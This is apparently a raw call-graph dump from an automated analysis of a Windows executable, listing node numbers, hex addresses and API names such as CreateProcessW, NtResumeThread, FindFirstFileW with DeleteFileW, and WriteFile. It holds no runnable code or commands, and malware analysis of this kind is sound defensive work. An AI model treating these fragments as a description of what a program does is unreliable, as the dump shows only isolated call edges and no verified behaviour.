99118->99119 99120 e51981 59 API calls 99119->99120 99121 ebdf05 Mailbox 99120->99121 99122 ebdf41 Mailbox 99121->99122 99170 ebd6c8 61 API calls 2 library calls 99121->99170 99122->99098 99124 ebd072 99123->99124 99128 ebd0c7 99123->99128 99125 e60fe6 Mailbox 59 API calls 99124->99125 99126 ebd094 99125->99126 99127 e60fe6 Mailbox 59 API calls 99126->99127 99126->99128 99127->99126 99129 ebe139 99128->99129 99130 ebe362 Mailbox 99129->99130 99137 ebe15c _strcat _wcscpy __NMSG_WRITE 99129->99137 99130->99088 99131 e450d5 59 API calls 99131->99137 99132 e4502b 59 API calls 99132->99137 99133 e45087 59 API calls 99133->99137 99134 e44d37 84 API calls 99134->99137 99135 e6593c 58 API calls __crtCompareStringA_stat 99135->99137 99137->99130 99137->99131 99137->99132 99137->99133 99137->99134 99137->99135 99171 ea5e42 61 API calls 2 library calls 99137->99171 99140 e60e4d 99138->99140 99139 e60ee5 NtResumeThread 99142 e60eb3 99139->99142 99140->99139 99141 e60ed3 CloseHandle 99140->99141 99140->99142 99141->99142 99142->99091 99142->99092 99143->99098 99144->99098 99145->99095 99147 e447c6 99146->99147 99148 e60fe6 Mailbox 59 API calls 99147->99148 99149 e447d4 99148->99149 99150 e447e0 99149->99150 99172 e446ec 59 API calls Mailbox 99149->99172 99152 e44540 99150->99152 99173 e44650 99152->99173 99154 e60fe6 Mailbox 59 API calls 99155 e445eb 99154->99155 99155->99109 99157 e44230 59 API calls Mailbox 99155->99157 99156 e4454f 99156->99154 99156->99155 99157->99102 99158->99109 99159->99109 99160->99109 99161->99080 99162->99109 99164 e9f92e __NMSG_WRITE 99163->99164 99165 e9f96d 99164->99165 99168 e9f963 99164->99168 99169 e9fa14 99164->99169 99165->99116 99165->99121 99166 e514db 61 API calls 99166->99168 99167 e514db 61 API calls 99167->99169 99168->99165 99168->99166 99169->99165 99169->99167 99170->99122 99171->99137 99172->99150 99174 e44659 Mailbox 99173->99174 99175 e7d6ec 99174->99175 99180 e44663 99174->99180 99176 e60fe6 Mailbox 59 API calls 99175->99176 99178 e7d6f8 99176->99178 99177 e4466a 99177->99156 99180->99177 99181 e45190 59 API calls Mailbox 99180->99181 99181->99180 99183 ebfda3 _memset 99182->99183 99184 ebfe0a 99183->99184 99185 ebfde0 99183->99185 99189 e4502b 59 API calls 99184->99189 99190 ebfe2e 99184->99190 99186 e4502b 59 API calls 99185->99186 99187 ebfdeb 99186->99187 99187->99190 99193 e4502b 59 API calls 99187->99193 99188 ebfe68 99192 e44d37 84 API calls 99188->99192 99191 ebfe00 99189->99191 99190->99188 99194 e4502b 59 API calls 99190->99194 99196 e4502b 59 API calls 99191->99196 99195 ebfe8c 99192->99195 99193->99191 99194->99188 99265 e5436a 99195->99265 99196->99190 99198 ebfe96 99199 ebff59 99198->99199 99200 ebfea0 99198->99200 99202 ebff8b GetCurrentDirectoryW 99199->99202 99205 e44d37 84 API calls 99199->99205 99201 e44d37 84 API calls 99200->99201 99203 ebfeb1 99201->99203 99204 e60fe6 Mailbox 59 API calls 99202->99204 99206 e5436a 59 API calls 99203->99206 99207 ebffb0 GetCurrentDirectoryW 99204->99207 99208 ebff70 99205->99208 99210 ebfebb 99206->99210 99211 ebffbd 99207->99211 99209 e5436a 59 API calls 99208->99209 99212 ebff7a __NMSG_WRITE 99209->99212 99213 e44d37 84 API calls 99210->99213 99219 ebfff6 99211->99219 99269 e44f98 99211->99269 99212->99202 99212->99219 99214 ebfecc 99213->99214 99215 e5436a 59 API calls 99214->99215 99217 ebfed6 99215->99217 99221 e44d37 84 API calls 99217->99221 99220 ec0042 99219->99220 99282 ea7652 8 API calls 99219->99282 99227 ec006e 99220->99227 99228 ec0114 CreateProcessW 99220->99228 99224 ebfee7 99221->99224 99222 e44f98 59 API calls 99225 ebffe6 99222->99225 99229 e5436a 59 API calls 99224->99229 99230 e44f98 59 API calls 99225->99230 99226 ec000d 99283 ea7561 8 API calls 99226->99283 99285 e98ef3 76 API calls 99227->99285 99264 ec00a7 __NMSG_WRITE 99228->99264 99231 ebfef1 99229->99231 99230->99219 99234 ebff27 GetSystemDirectoryW 99231->99234 99239 e44d37 84 API calls 99231->99239 99241 e60fe6 Mailbox 59 API calls 99234->99241 99235 ec0028 99284 ea75da 8 API calls 99235->99284 99236 ec0073 99237 ec009b 99236->99237 99238 ec00a2 99236->99238 99286 e98f2e 149 API calls 4 library calls 99237->99286 99287 e991cf 6 API calls 99238->99287 99243 ebff08 99239->99243 99245 ebff4c GetSystemDirectoryW 99241->99245 99247 e5436a 59 API calls 99243->99247 99245->99211 99246 ec00a0 99246->99264 99248 ebff12 __NMSG_WRITE 99247->99248 99248->99211 99248->99234 99249 ec0190 CloseHandle 99251 ec019e 99249->99251 99257 ec01c8 99249->99257 99250 ec0153 99252 ec0164 GetLastError 99250->99252 99288 ea7205 CloseHandle Mailbox 99251->99288 99256 ec0178 99252->99256 99254 ec01ce 99254->99256 99289 ea702f CloseHandle Mailbox 99256->99289 99257->99254 99260 ec01fa CloseHandle 99257->99260 99260->99256 99261 ebf94e 99261->98432 99264->99249 99264->99250 99266 e54374 __NMSG_WRITE 99265->99266 99267 e60fe6 Mailbox 59 API calls 99266->99267 99268 e54389 _wcscpy 99267->99268 99268->99198 99270 e7dd2b 99269->99270 99271 e44fa8 99269->99271 99272 e7dd3c 99270->99272 99273 e51821 59 API calls 99270->99273 99276 e60fe6 Mailbox 59 API calls 99271->99276 99274 e519e1 59 API calls 99272->99274 99273->99272 99275 e7dd46 99274->99275 99278 e44fd4 99275->99278 99280 e51207 59 API calls 99275->99280 99277 e44fbb 99276->99277 99277->99275 99279 e44fc6 99277->99279 99278->99222 99279->99278 99281 e51a36 59 API calls 99279->99281 99280->99278 99281->99278 99282->99226 99283->99235 99284->99220 99285->99236 99286->99246 99287->99264 99289->99261 99291 eaf898 99290->99291 99292 eaf8f2 99290->99292 99293 e60fe6 Mailbox 59 API calls 99291->99293 99366 eafbb7 59 API calls 99292->99366 99295 eaf89f 99293->99295 99296 eaf8ab 99295->99296 99353 e53df7 60 API calls Mailbox 99295->99353 99298 e44d37 84 API calls 99296->99298 99302 eaf8bd 99298->99302 99299 eaf9cb 99346 ea8cd0 99299->99346 99300 eaf8ff 99300->99299 99303 eaf8d9 99300->99303 99307 eaf93f 99300->99307 99354 e53e47 99302->99354 99303->98622 99304 eaf9d2 99350 ea394d 99304->99350 99309 e44d37 84 API calls 99307->99309 99308 eaf8cd 99308->99303 99365 e53f0b CloseHandle 99308->99365 99316 eaf946 99309->99316 99312 eaf9c1 99327 ea399c 99312->99327 99313 eaf97a 99367 e5162d 99313->99367 99316->99312 99316->99313 99318 e542cf CloseHandle 99319 eafa20 99318->99319 99319->99303 99372 e53f0b CloseHandle 99319->99372 99320 e51c9c 59 API calls 99321 eaf994 99320->99321 99323 e51900 59 API calls 99321->99323 99324 eaf9a2 99323->99324 99325 ea399c 66 API calls 99324->99325 99326 eaf9ae Mailbox 99325->99326 99326->99303 99326->99318 99328 ea39af 99327->99328 99329 ea3a15 99327->99329 99328->99329 99330 ea39b4 99328->99330 99331 ea394d 3 API calls 99329->99331 99332 ea3a09 99330->99332 99333 ea39be 99330->99333 99345 ea39fd Mailbox 99331->99345 99390 ea3a35 62 API calls Mailbox 99332->99390 99335 ea39de 99333->99335 99337 ea39c8 99333->99337 99336 e540cd 59 API calls 99335->99336 99338 ea39e6 99336->99338 99376 e540cd 99337->99376 99389 ea38e0 61 API calls Mailbox 99338->99389 99342 ea39dc 99373 ea397e 99342->99373 99345->99326 99347 ea8cd9 99346->99347 99349 ea8cde 99346->99349 99393 ea7d6e 61 API calls 2 library calls 99347->99393 99349->99304 99394 ea384c 99350->99394 99352 ea3959 WriteFile 99352->99326 99353->99296 99355 e542cf CloseHandle 99354->99355 99356 e53e53 99355->99356 99403 e542f9 99356->99403 99358 e53e72 99362 e53e95 99358->99362 99411 e53c61 62 API calls Mailbox 99358->99411 99360 e53e84 99412 e5389f 99360->99412 99362->99300 99362->99308 99364 ea394d 3 API calls 99364->99362 99365->99303 99366->99300 99368 e60fe6 Mailbox 59 API calls 99367->99368 99369 e51652 99368->99369 99370 e60fe6 Mailbox 59 API calls 99369->99370 99371 e51660 99370->99371 99371->99320 99372->99303 99374 ea394d 3 API calls 99373->99374 99375 ea3990 99374->99375 99375->99345 99377 e60fe6 Mailbox 59 API calls 99376->99377 99378 e540e0 99377->99378 99379 e51c7e 59 API calls 99378->99379 99380 e540ed 99379->99380 99381 e5402a WideCharToMultiByte 99380->99381 99382 e54085 99381->99382 99383 e5404e 99381->99383 99392 e53f20 59 API calls Mailbox 99382->99392 99385 e60fe6 Mailbox 59 API calls 99383->99385 99386 e54055 WideCharToMultiByte 99385->99386 99391 e53f79 59 API calls 2 library calls 99386->99391 99388 e54077 99388->99342 99389->99342 99390->99345 99391->99388 99392->99388 99393->99349 99395 ea385e 99394->99395 99396 ea3853 99394->99396 99395->99352 99401 e542ae SetFilePointerEx 99396->99401 99398 ea38b8 SetFilePointerEx 99402 e542ae SetFilePointerEx 99398->99402 99400 ea38d7 99400->99352 99401->99398 99402->99400 99404 e906fc 99403->99404 99405 e54312 CreateFileW 99403->99405 99406 e54334 99404->99406 99407 e90702 CreateFileW 99404->99407 99405->99406 99406->99358 99407->99406 99408 e90728 99407->99408 99416 e5410a 99408->99416 99411->99360 99413 e538b5 99412->99413 99414 e538a8 99412->99414 99413->99362 99413->99364 99415 e5410a 2 API calls 99414->99415 99415->99413 99423 e54124 99416->99423 99417 e906cc 99425 e542ae SetFilePointerEx 99417->99425 99418 e541ab SetFilePointerEx 99424 e542ae SetFilePointerEx 99418->99424 99421 e906e6 99422 e5417f 99422->99406 99423->99417 99423->99418 99423->99422 99424->99422 99425->99421 99427 e51207 59 API calls 99426->99427 99428 ea4024 99427->99428 99429 e51207 59 API calls 99428->99429 99430 ea402d 99429->99430 99431 e51207 59 API calls 99430->99431 99432 ea4036 99431->99432 99433 e60284 60 API calls 99432->99433 99434 ea4041 99433->99434 99435 ea4fec GetFileAttributesW 99434->99435 99436 ea404a 99435->99436 99437 ea405c 99436->99437 99438 e51900 59 API calls 99436->99438 99439 e60119 59 API calls 99437->99439 99438->99437 99440 ea4070 FindFirstFileW 99439->99440 99441 ea40fc FindClose 99440->99441 99444 ea408f 99440->99444 99445 ea4107 Mailbox 99441->99445 99442 ea40d7 FindNextFileW 99442->99444 99443 e51c9c 59 API calls 99443->99444 99444->99441 99444->99442 99444->99443 99446 e517e0 59 API calls 99444->99446 99447 e51900 59 API calls 99444->99447 99445->98627 99446->99444 99448 ea40c8 DeleteFileW 99447->99448 99448->99442 99449 ea40f3 FindClose 99448->99449 99449->99445 99450->98643 99451->98653 99452->98650 99454 eba918 99453->99454 99455 eba970 99453->99455 99456 e60fe6 Mailbox 59 API calls 99454->99456 99455->98683 99459 eba93a 99456->99459 99457 e60fe6 Mailbox 59 API calls 99457->99459 99459->99455 99459->99457 99485 e9715b 59 API calls Mailbox 99459->99485 99461 ea78ac 99460->99461 99463 ea78e3 99460->99463 99462 e60fe6 Mailbox 59 API calls 99461->99462 99461->99463 99462->99463 99464 e96ebc 99463->99464 99465 e96f06 99464->99465 99469 e96f1c Mailbox 99464->99469 99466 e51a36 59 API calls 99465->99466 99466->99469 99467 e96f5a 99471 e4a820 430 API calls 99467->99471 99468 e96f47 99470 ebc355 430 API calls 99468->99470 99469->99467 99469->99468 99473 e96f53 99470->99473 99476 e96f91 99471->99476 99494 e96cf1 59 API calls Mailbox 99473->99494 99474 e97002 99474->98710 99475 e96fdc 99475->99473 99493 eaa48d 89 API calls 4 library calls 99475->99493 99476->99473 99476->99475 99478 e96fc1 99476->99478 99486 e9706d 99478->99486 99480->98710 99481->98694 99482->98698 99483->98711 99484->98715 99485->99459 99487 e97085 99486->99487 99490 e519e1 59 API calls 99487->99490 99495 eb495b 99487->99495 99504 ebf1b2 99487->99504 99509 e4ec83 99487->99509 99488 e970d9 99488->99473 99490->99488 99493->99473 99494->99474 99496 e60fe6 Mailbox 59 API calls 99495->99496 99497 eb496c 99496->99497 99584 e5433f 99497->99584 99500 e44d37 84 API calls 99501 eb498d GetEnvironmentVariableW 99500->99501 99587 ea7a51 59 API calls Mailbox 99501->99587 99503 eb49aa 99503->99488 99505 e44d37 84 API calls 99504->99505 99506 ebf1cf 99505->99506 99507 ea4148 66 API calls 99506->99507 99508 ebf1de 99507->99508 99508->99488 99510 e44d37 84 API calls 99509->99510 99511 e4eca2 99510->99511 99512 e44d37 84 API calls 99511->99512 99513 e4ecb7 99512->99513 99514 e44d37 84 API calls 99513->99514 99515 e4ecca 99514->99515 99516 e44d37 84 API calls 99515->99516 99517 e4ece0 99516->99517 99518 e5162d 59 API calls 99517->99518 99519 e4ecf4 99518->99519 99520 e4ed19 99519->99520 99521 e4502b 59 API calls 99519->99521 99522 e4ed43 __wopenfile 99520->99522 99523 e85b67 99520->99523 99521->99520 99526 e4ef3e 99522->99526 99529 e44d37 84 API calls 99522->99529 99555 e85c0f 99522->99555 99574 e4ee30 __wopenfile 99522->99574 99524 e447be 59 API calls 99523->99524 99525 e85b7a 99524->99525 99527 e44540 59 API calls 99525->99527 99528 e447be 59 API calls 99526->99528 99531 e85b8c 99527->99531 99530 e85d4a 99528->99530 99532 e4edca 99529->99532 99533 e85d53 99530->99533 99534 e85d97 99530->99534 99535 e443d0 59 API calls 99531->99535 99558 e85bb1 99531->99558 99536 e44d37 84 API calls 99532->99536 99539 e44540 59 API calls 99533->99539 99537 e44540 59 API calls 99534->99537 99535->99558 99540 e4eddf 99536->99540 99541 e85da1 99537->99541 99538 e4ef0c Mailbox 99538->99488 99543 e85d5e 99539->99543 99540->99526 99547 e447be 59 API calls 99540->99547 99545 e443d0 59 API calls 99541->99545 99544 e44d37 84 API calls 99543->99544 99546 e85d70 99544->99546 99548 e85dbd 99545->99548 99603 e51364 59 API calls 2 library calls 99546->99603 99552 e4edfe 99547->99552 99562 e44d37 84 API calls 99548->99562 99549 e4477a 59 API calls 99549->99558 99550 e44540 59 API calls 99553 e85c76 99550->99553 99552->99555 99556 e4ee09 99552->99556 99559 e443d0 59 API calls 99553->99559 99554 e85d84 99560 e4477a 59 API calls 99554->99560 99555->99526 99555->99550 99561 e44540 59 API calls 99556->99561 99557 e443d0 59 API calls 99557->99558 99558->99538 99558->99549 99558->99557 99601 e51364 59 API calls 2 library calls 99558->99601 99559->99574 99564 e85d92 99560->99564 99565 e4ee18 99561->99565 99566 e85dd8 99562->99566 99571 e443d0 59 API calls 99564->99571 99567 e519e1 59 API calls 99565->99567 99604 e51364 59 API calls 2 library calls 99566->99604 99567->99574 99569 e4477a 59 API calls 99569->99574 99570 e85dec 99572 e4477a 59 API calls 99570->99572 99571->99538 99572->99564 99573 e443d0 59 API calls 99573->99574 99574->99538 99574->99569 99574->99573 99576 e85cc2 99574->99576 99600 e51364 59 API calls 2 library calls 99574->99600 99575 e85cfb 99588 e4477a 99575->99588 99576->99575 99578 e85cec 99576->99578 99602 e5153b 59 API calls 2 library calls 99578->99602 99582 e85d1c 99583 e519e1 59 API calls 99582->99583 99583->99526 99585 e60fe6 Mailbox 59 API calls 99584->99585 99586 e54351 99585->99586 99586->99500 99587->99503 99589 e60fe6 Mailbox 59 API calls 99588->99589 99590 e44787 99589->99590 99591 e443d0 99590->99591 99592 e7d6c9 99591->99592 99598 e443e7 99591->99598 99592->99598 99606 e440cb 59 API calls Mailbox 99592->99606 99594 e44530 99605 e4523c 59 API calls 99594->99605 99595 e444e8 99596 e60fe6 Mailbox 59 API calls 99595->99596 99599 e444ef 99596->99599 99598->99594 99598->99595 99598->99599 99599->99582 99600->99574 99601->99558 99602->99526 99603->99554 99604->99570 99605->99599 99606->99598 99608 ea4d09 99607->99608 99609 ea4cf0 99607->99609 99614 e637c3 59 API calls __wcstoi64 99608->99614 99609->99608 99612 ea4d0f 99609->99612 99613 e6385c GetStringTypeW _iswctype 99609->99613 99612->98727 99613->99609 99614->99612 99616 e43b3f 99615->99616 99622 e43b67 99615->99622 99617 e43b4d 99616->99617 99618 e43b31 59 API calls 99616->99618 99619 e43b53 99617->99619 99620 e43b31 59 API calls 99617->99620 99618->99617 99619->99622 99625 e45190 59 API calls Mailbox 99619->99625 99620->99619 99622->98446 99623->98451 99624->98443 99625->99622 99627 e46e4a 99626->99627 99630 e46ff7 99626->99630 99629 e474d0 99627->99629 99627->99630 99632 e46f2c 99627->99632 99633 e46fdb 99627->99633 99628 e47076 99628->99633 99635 e7fc1e 99628->99635 99639 e46fbb Mailbox 99628->99639 99650 e97aad 59 API calls 99628->99650 99629->99633 99653 e449e0 59 API calls __gmtime64_s 99629->99653 99630->99628 99630->99629 99630->99633 99630->99639 99632->99628 99632->99633 99638 e46f68 99632->99638 99633->98487 99633->99633 99637 e7fc30 99635->99637 99651 e63f69 59 API calls __wtof_l 99635->99651 99637->98487 99638->99633 99638->99639 99642 e7fa71 99638->99642 99639->99633 99639->99635 99652 e441c4 59 API calls Mailbox 99639->99652 99642->99633 99649 e63f69 59 API calls __wtof_l 99642->99649 99643->98487 99644->98478 99645->98488 99646->98491 99647->98488 99648->98488 99649->99642 99650->99639 99651->99637 99652->99639 99653->99633 99654->98494 99655 e67e83 99656 e67e8f __initptd 99655->99656 99692 e6a038 GetStartupInfoW 99656->99692 99658 e67e94 99694 e68dac GetProcessHeap 99658->99694 99660 e67eec 99661 e67ef7 99660->99661 99777 e67fd3 58 API calls 3 library calls 99660->99777 99695 e69d16 99661->99695 99664 e67efd 99665 e67f08 __RTC_Initialize 99664->99665 99778 e67fd3 58 API calls 3 library calls 99664->99778 99716 e6d802 99665->99716 99668 e67f17 99669 e67f23 GetCommandLineW 99668->99669 99779 e67fd3 58 API calls 3 library calls 99668->99779 99735 e75153 GetEnvironmentStringsW 99669->99735 99673 e67f22 99673->99669 99675 e67f3d 99678 e67f48 99675->99678 99780 e632e5 58 API calls 3 library calls 99675->99780 99745 e74f88 99678->99745 99679 e67f4e 99680 e67f59 99679->99680 99781 e632e5 58 API calls 3 library calls 99679->99781 99759 e6331f 99680->99759 99683 e67f61 99684 e67f6c __wwincmdln 99683->99684 99782 e632e5 58 API calls 3 library calls 99683->99782 99765 e55f8b 99684->99765 99687 e67f80 99688 e67f8f 99687->99688 99783 e63588 58 API calls _doexit 99687->99783 99784 e63310 58 API calls _doexit 99688->99784 99691 e67f94 __initptd 99693 e6a04e 99692->99693 99693->99658 99694->99660 99785 e633b7 36 API calls 2 library calls 99695->99785 99697 e69d1b 99786 e69f6c InitializeCriticalSectionAndSpinCount __mtinitlocknum 99697->99786 99699 e69d20 99700 e69d24 99699->99700 99788 e69fba TlsAlloc 99699->99788 99787 e69d8c 61 API calls 2 library calls 99700->99787 99703 e69d29 99703->99664 99704 e69d36 99704->99700 99705 e69d41 99704->99705 99789 e68a05 99705->99789 99708 e69d83 99797 e69d8c 61 API calls 2 library calls 99708->99797 99711 e69d62 99711->99708 99713 e69d68 99711->99713 99712 e69d88 99712->99664 99796 e69c63 58 API calls 3 library calls 99713->99796 99715 e69d70 GetCurrentThreadId 99715->99664 99717 e6d80e __initptd 99716->99717 99718 e69e3b __lock 58 API calls 99717->99718 99719 e6d815 99718->99719 99720 e68a05 __calloc_crt 58 API calls 99719->99720 99721 e6d826 99720->99721 99722 e6d891 GetStartupInfoW 99721->99722 99723 e6d831 __initptd @_EH4_CallFilterFunc@8 99721->99723 99729 e6d8a6 99722->99729 99732 e6d9d5 99722->99732 99723->99668 99724 e6da9d 99811 e6daad LeaveCriticalSection _doexit 99724->99811 99726 e68a05 __calloc_crt 58 API calls 99726->99729 99727 e6da22 GetStdHandle 99727->99732 99728 e6da35 GetFileType 99728->99732 99729->99726 99730 e6d8f4 99729->99730 99729->99732 99731 e6d928 GetFileType 99730->99731 99730->99732 99809 e6a05b InitializeCriticalSectionAndSpinCount 99730->99809 99731->99730 99732->99724 99732->99727 99732->99728 99810 e6a05b InitializeCriticalSectionAndSpinCount 99732->99810 99736 e75164 99735->99736 99737 e67f33 99735->99737 99812 e68a4d 58 API calls 2 library calls 99736->99812 99741 e74d4b GetModuleFileNameW 99737->99741 99739 e7518a _memmove 99740 e751a0 FreeEnvironmentStringsW 99739->99740 99740->99737 99742 e74d7f _wparse_cmdline 99741->99742 99744 e74dbf _wparse_cmdline 99742->99744 99813 e68a4d 58 API calls 2 library calls 99742->99813 99744->99675 99746 e74f99 99745->99746 99748 e74fa1 __NMSG_WRITE 99745->99748 99746->99679 99747 e68a05 __calloc_crt 58 API calls 99755 e74fca __NMSG_WRITE 99747->99755 99748->99747 99749 e75021 99750 e62f85 _free 58 API calls 99749->99750 99750->99746 99751 e68a05 __calloc_crt 58 API calls 99751->99755 99752 e75046 99753 e62f85 _free 58 API calls 99752->99753 99753->99746 99755->99746 99755->99749 99755->99751 99755->99752 99756 e7505d 99755->99756 99814 e74837 58 API calls __fclose_nolock 99755->99814 99815 e68ff6 IsProcessorFeaturePresent 99756->99815 99758 e75069 99758->99679 99761 e6332b __IsNonwritableInCurrentImage 99759->99761 99838 e6a701 99761->99838 99762 e63349 __initterm_e 99763 e62f70 __cinit 67 API calls 99762->99763 99764 e63368 __cinit __IsNonwritableInCurrentImage 99762->99764 99763->99764 99764->99683 99766 e55fa5 99765->99766 99776 e56044 99765->99776 99767 e55fdf IsThemeActive 99766->99767 99841 e6359c 99767->99841 99771 e5600b 99853 e55f00 SystemParametersInfoW SystemParametersInfoW 99771->99853 99773 e56017 99854 e55240 99773->99854 99776->99687 99777->99661 99778->99665 99779->99673 99783->99688 99784->99691 99785->99697 99786->99699 99787->99703 99788->99704 99792 e68a0c 99789->99792 99791 e68a47 99791->99708 99795 e6a016 TlsSetValue 99791->99795 99792->99791 99794 e68a2a 99792->99794 99798 e75426 99792->99798 99794->99791 99794->99792 99806 e6a362 Sleep 99794->99806 99795->99711 99796->99715 99797->99712 99799 e75431 99798->99799 99805 e7544c 99798->99805 99800 e7543d 99799->99800 99799->99805 99807 e68d58 58 API calls __getptd_noexit 99800->99807 99802 e7545c HeapAlloc 99803 e75442 99802->99803 99802->99805 99803->99792 99805->99802 99805->99803 99808 e635d1 DecodePointer 99805->99808 99806->99794 99807->99803 99808->99805 99809->99730 99810->99732 99811->99723 99812->99739 99813->99744 99814->99755 99816 e69001 99815->99816 99821 e68e89 99816->99821 99820 e6901c 99820->99758 99822 e68ea3 _memset ___raise_securityfailure 99821->99822 99823 e68ec3 IsDebuggerPresent 99822->99823 99829 e6a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99823->99829 99826 e68faa 99828 e6a370 GetCurrentProcess TerminateProcess 99826->99828 99827 e68f87 ___raise_securityfailure 99830 e6c826 99827->99830 99828->99820 99829->99827 99831 e6c830 IsProcessorFeaturePresent 99830->99831 99832 e6c82e 99830->99832 99834 e75b3a 99831->99834 99832->99826 99837 e75ae9 5 API calls 2 library calls 99834->99837 99836 e75c1d 99836->99826 99837->99836 99839 e6a704 EncodePointer 99838->99839 99839->99839 99840 e6a71e 99839->99840 99840->99762 99842 e69e3b __lock 58 API calls 99841->99842 99843 e635a7 DecodePointer EncodePointer 99842->99843 99906 e69fa5 LeaveCriticalSection 99843->99906 99845 e56004 99846 e63604 99845->99846 99847 e6360e 99846->99847 99848 e63628 99846->99848 99847->99848 99907 e68d58 58 API calls __getptd_noexit 99847->99907 99848->99771 99850 e63618 99908 e68fe6 9 API calls __fclose_nolock 99850->99908 99852 e63623 99852->99771 99853->99773 99855 e5524d __ftell_nolock 99854->99855 99856 e51207 59 API calls 99855->99856 99857 e55258 GetCurrentDirectoryW 99856->99857 99909 e54ec8 99857->99909 99859 e5527e IsDebuggerPresent 99860 e90b21 MessageBoxA 99859->99860 99861 e5528c 99859->99861 99862 e90b39 99860->99862 99861->99862 99863 e552a0 99861->99863 100032 e5314d 59 API calls Mailbox 99862->100032 99977 e531bf 99863->99977 99866 e90b49 99873 e90b5f SetCurrentDirectoryW 99866->99873 99872 e5536c Mailbox 99873->99872 99906->99845 99907->99850 99908->99852 99910 e51207 59 API calls 99909->99910 99911 e54ede 99910->99911 100041 e55420 99911->100041 99913 e54efc 99914 e519e1 59 API calls 99913->99914 99915 e54f10 99914->99915 99916 e51c9c 59 API calls 99915->99916 99917 e54f1b 99916->99917 99918 e4477a 59 API calls 99917->99918 99919 e54f27 99918->99919 99920 e51a36 59 API calls 99919->99920 99921 e54f34 99920->99921 99922 e439be 68 API calls 99921->99922 99923 e54f44 Mailbox 99922->99923 99924 e51a36 59 API calls 99923->99924 99925 e54f68 99924->99925 99926 e439be 68 API calls 99925->99926 99927 e54f77 Mailbox 99926->99927 99928 e51207 59 API calls 99927->99928 99929 e54f94 99928->99929 100055 e555bc 99929->100055 99933 e54fae 99934 e90a54 99933->99934 99935 e54fb8 99933->99935 99936 e555bc 59 API calls 99934->99936 99937 e6312d _W_store_winword 60 API calls 99935->99937 99938 e90a68 99936->99938 99939 e54fc3 99937->99939 99941 e555bc 59 API calls 99938->99941 99939->99938 99940 e54fcd 99939->99940 99942 e6312d _W_store_winword 60 API calls 99940->99942 99943 e90a84 99941->99943 99944 e54fd8 99942->99944 99947 e600cf 61 API calls 99943->99947 99944->99943 99945 e54fe2 99944->99945 99946 e6312d _W_store_winword 60 API calls 99945->99946 99949 e54fed 99946->99949 99948 e90aa7 99947->99948 99950 e555bc 59 API calls 99948->99950 99951 e90ad0 99949->99951 99952 e54ff7 99949->99952 99953 e90ab3 99950->99953 99955 e555bc 59 API calls 99951->99955 99954 e5501b 99952->99954 99957 e51c9c 59 API calls 99952->99957 99956 e51c9c 59 API calls 99953->99956 99961 e447be 59 API calls 99954->99961 99958 e90aee 99955->99958 99959 e90ac1 99956->99959 99960 e5500e 99957->99960 99962 e51c9c 59 API calls 99958->99962 99963 e555bc 59 API calls 99959->99963 99964 e555bc 59 API calls 99960->99964 99965 e5502a 99961->99965 99966 e90afc 99962->99966 99963->99951 99964->99954 99967 e44540 59 API calls 99965->99967 99968 e555bc 59 API calls 99966->99968 99969 e55038 99967->99969 99970 e90b0b 99968->99970 99971 e443d0 59 API calls 99969->99971 99970->99970 99974 e55055 99971->99974 99972 e4477a 59 API calls 99972->99974 99973 e443d0 59 API calls 99973->99974 99974->99972 99974->99973 99975 e555bc 59 API calls 99974->99975 99976 e5509b Mailbox 99974->99976 99975->99974 99976->99859 99978 e531cc __ftell_nolock 99977->99978 99979 e531e5 99978->99979 99980 e90314 _memset 99978->99980 99981 e60284 60 API calls 99979->99981 99982 e90330 GetOpenFileNameW 99980->99982 100032->99866 100042 e5542d __ftell_nolock 100041->100042 100043 e51821 59 API calls 100042->100043 100048 e55590 Mailbox 100042->100048 100045 e5545f 100043->100045 100044 e51609 59 API calls 100044->100045 100045->100044 100054 e55495 Mailbox 100045->100054 100046 e51609 59 API calls 100046->100054 100047 e55563 100047->100048 100049 e51a36 59 API calls 100047->100049 100048->99913 100050 e55584 100049->100050 100052 e54c94 59 API calls 100050->100052 100051 e51a36 59 API calls 100051->100054 100052->100048 100054->100046 100054->100047 100054->100048 100054->100051 100071 e54c94 100054->100071 100056 e555c6 100055->100056 100057 e555df 100055->100057 100058 e51c9c 59 API calls 100056->100058 100059 e51821 59 API calls 100057->100059 100060 e54fa0 100058->100060 100059->100060 100061 e6312d 100060->100061 100062 e631ae 100061->100062 100063 e63139 100061->100063 100079 e631c0 60 API calls 3 library calls 100062->100079 100070 e6315e 100063->100070 100077 e68d58 58 API calls __getptd_noexit 100063->100077 100066 e631bb 100066->99933 100067 e63145 100078 e68fe6 9 API calls __fclose_nolock 100067->100078 100069 e63150 100069->99933 100070->99933 100073 e54ca2 100071->100073 100076 e54cc4 _memmove 100071->100076 100072 e60fe6 Mailbox 59 API calls 100074 e54cd8 100072->100074 100075 e60fe6 Mailbox 59 API calls 100073->100075 100074->100054 100075->100076 100076->100072 100077->100067 100078->100069 100079->100066 100925 e46981 100926 e4373a 59 API calls 100925->100926 100927 e46997 100926->100927 100932 e47b3f 100927->100932 100929 e469bf 100930 e4584d 100929->100930 100944 eaa48d 89 API calls 4 library calls 100929->100944 100933 e5162d 59 API calls 100932->100933 100934 e47b64 _wcscmp 100932->100934 100933->100934 100935 e47b98 Mailbox 100934->100935 100936 e51a36 59 API calls 100934->100936 100935->100929 100937 e7ffad 100936->100937 100938 e517e0 59 API calls 100937->100938 100939 e7ffb8 100938->100939 100945 e43938 68 API calls 100939->100945 100941 e7ffc9 100943 e7ffcd Mailbox 100941->100943 100946 e4523c 59 API calls 100941->100946 100943->100929 100944->100930 100945->100941 100946->100943 100947 e54d83 100948 e54dba 100947->100948 100949 e54e37 100948->100949 100950 e54dd8 100948->100950 100987 e54e35 100948->100987 100951 e54e3d 100949->100951 100952 e909c2 100949->100952 100953 e54de5 100950->100953 100954 e54ead PostQuitMessage 100950->100954 100956 e54e65 SetTimer RegisterWindowMessageW 100951->100956 100957 e54e42 100951->100957 101002 e4c460 10 API calls Mailbox 100952->101002 100958 e54df0 100953->100958 100959 e90a35 100953->100959 100981 e54e28 100954->100981 100955 e54e1a DefWindowProcW 100955->100981 100963 e54e8e CreatePopupMenu 100956->100963 100956->100981 100961 e90965 100957->100961 100962 e54e49 KillTimer 100957->100962 100964 e54eb7 100958->100964 100965 e54df8 100958->100965 101005 ea2cce 97 API calls _memset 100959->101005 100968 e9096a 100961->100968 100969 e9099e MoveWindow 100961->100969 100970 e55ac3 Shell_NotifyIconW 100962->100970 100963->100981 100992 e55b29 100964->100992 100971 e90a1a 100965->100971 100972 e54e03 100965->100972 100967 e909e9 101003 e4c483 430 API calls Mailbox 100967->101003 100976 e9098d SetFocus 100968->100976 100977 e9096e 100968->100977 100969->100981 